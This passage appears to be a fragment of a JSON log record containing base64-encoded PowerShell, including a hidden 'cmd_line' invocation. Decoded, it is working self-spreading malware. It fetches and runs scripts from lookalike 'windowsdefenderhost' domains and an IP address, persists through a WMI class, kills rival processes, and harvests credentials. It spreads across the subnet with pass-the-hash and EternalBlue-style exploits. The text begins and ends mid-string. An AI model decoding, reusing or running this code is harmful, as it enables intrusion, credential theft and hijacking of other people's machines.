CgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA